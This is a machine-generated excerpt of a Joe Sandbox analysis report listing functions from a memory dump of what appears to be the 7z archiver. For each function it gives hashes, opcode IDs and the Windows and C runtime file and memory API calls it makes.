                                                                                                                                                                                                        • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                        • Instruction ID: 85fb20e16bd2e7b5b69cac631b9b708d95f3a514b2a2dcdb061a0fb75a151128
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6131FB72214B46C6EB10DF28E89036A7BB0F784B65F504225E6A9437F4DB7CC885CB54
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$fputsmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4106585527-0
                                                                                                                                                                                                        • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                        • Instruction ID: f8370ea3786f53814c8ee2221fff8f75b34ce0e958104096cb8e823a901603c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D601A92330984091CE20AB25E85135E7761E7C6BF5F0453A1BE6F977F8DE28C58ACB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFilefree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1936811914-0
                                                                                                                                                                                                        • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                        • Instruction ID: 20b246ac0c26e1c8558bea7954f65b872e17d06971c00be4ccf8d86fc61d0fd4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA01A72230461181D6309B21D58037E17E4DB8A7F6F5803E19E69977A4CE24CD8E9751
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFilefree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1936811914-0
                                                                                                                                                                                                        • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                        • Instruction ID: dd7e9c85ef665bdbd187357cef7f5c07816a7ac72bbe8e16d52baa2a3c6459e6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7F03166348A0181CA20AB35E99437D22B4DB8A7F6F5403F0EF79967E5DF18C98E8700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                        • Instruction ID: f77feefc68a6f5569a393a24e17ee85d08959fc0c666eb4be996ff8ac00336a9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35519E72705A8097CA30DB16E88029DB3A0F789FD4F408266EF9E47B19DF38C5A5CB50
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                        • Instruction ID: c14f39bca7d7d2be42562bc93b77141a4d2b3e0d4224ccb36c4951b94234c11b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8831E2237156808ACF30DF25E48052EA7E1F7897A0B58C2B5EF6E47758DB38C885CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                        • Instruction ID: 5537e3677c1b790328dd016faff2d70a7e576ebed463e6ae1821b91b7029d515
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6711532230994051DA50EB25E5913AE97A0EBD17F1F5052E1BEBE87AF9DE18C94ECB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3934437811-0
                                                                                                                                                                                                        • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                        • Instruction ID: bf55337317c8981941cf380a8fa695826fd827b5587a73005bbb33305b65f739
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118453701A808BCA219F35E95139ABB90EB427E4F484295EFAD0B7A9DF78D54AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                        • Instruction ID: 0743982c0888d7b90c52a9b860e184c4b3acbcd9a9061661776b2e9cdac81aeb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E401C823315A4080C920FB21F45526E93A1EBC2BE5F5452E27EAE677A6CE28C54ECB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B589D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 00B589EA
                                                                                                                                                                                                        • CreateFileW.KERNELBASE ref: 00B58D51
                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 00B58DA4
                                                                                                                                                                                                        • free.MSVCRT ref: 00B58DB2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 210839660-0
                                                                                                                                                                                                        • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                        • Instruction ID: 4af2c48af3e3d1e50b2bf397a19dfc53b5a4efd945c62234d88983b4a9ba05cc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96217F332046919AC7609F15A84175A77A4F39A7F5F5403A5EFB563BE4CF38C89A8B00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B53274: memmove.MSVCRT ref: 00B532AC
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92D41
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92DCF
                                                                                                                                                                                                        • free.MSVCRT ref: 00B92DFF
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1158454270-0
                                                                                                                                                                                                        • Opcode ID: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
                                                                                                                                                                                                        • Instruction ID: 89f15ff36ea462057833d04a4a441ca96f6276686658ed4cdc44314f5dcb6348
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B42192A2705A0190CF24EF25E85136E63A0EB86BE5F4492B1EE5F47769DF2CC549C704
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3796167841-0
                                                                                                                                                                                                        • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                        • Instruction ID: d704e93760b1eb8ccac4b76f72f6acd0490cc4565e52226329d388437da0464a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0851E7233107549BDF258E7AD55076927E1F704796F1402E6DF0A87B50DB39E8AEC300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputc
                                                                                                                                                                                                        • String ID: Kernel
                                                                                                                                                                                                        • API String ID: 1992160199-1736990243
                                                                                                                                                                                                        • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                        • Instruction ID: 1107c6b1669591a6a253255b5ac33eaf7dba985ebf5c5a8fe37b3303f19ab12d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06C09295B94A0882EF181BBBE8853392222D75DFA1F186030CF1D4B390DA2CD4E68725
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                          • Part of subcall function 00B52B04: _CxxThrowException.MSVCRT ref: 00B52B2D
                                                                                                                                                                                                          • Part of subcall function 00B52B04: free.MSVCRT ref: 00B52B44
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3104931167-0
                                                                                                                                                                                                        • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                        • Instruction ID: fcc6b8fc747818a22a8632700296a73d2c4b64ed5e42568d02901be89e528e72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3901AD677006909AEB09DF6BEA84B5E7BA0F759B94F088462DF0807711DB74D8AAC310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,00000003,?,00B58E1D), ref: 00B58A99
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000003,?,00B58E1D), ref: 00B58AA6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                        • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                        • Instruction ID: 5fd568d9686f161a2af3f2f397c38c1554fcebf05b25915005705c8417219068
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAF0FC62B017C083DF208B79E4447683391E75979AF6C40A3CF0853760DF29C8DACB10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputcfputsfree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2822829076-0
                                                                                                                                                                                                        • Opcode ID: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
                                                                                                                                                                                                        • Instruction ID: 9dfb14c281c6f4a3ca602ad48f5b35a1c71b92060617489d88fb666c3503f01c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F0826321194480CA20EB25E84531E6360E789BF8F4843A0EE6D577E9DF28C58AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B8404D
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B84087
                                                                                                                                                                                                          • Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
                                                                                                                                                                                                          • Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1415420288-0
                                                                                                                                                                                                        • Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                        • Instruction ID: 8fa9fc44d38e25c7a8dc30580a5ac94cb6cf9fe757a73d58d9005d10e331b276
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4831B3673196C196CA31FF14E1942EEBBA0F791740F4040A6CB9D47B29EF38D659CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B84065
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B84087
                                                                                                                                                                                                          • Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
                                                                                                                                                                                                          • Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
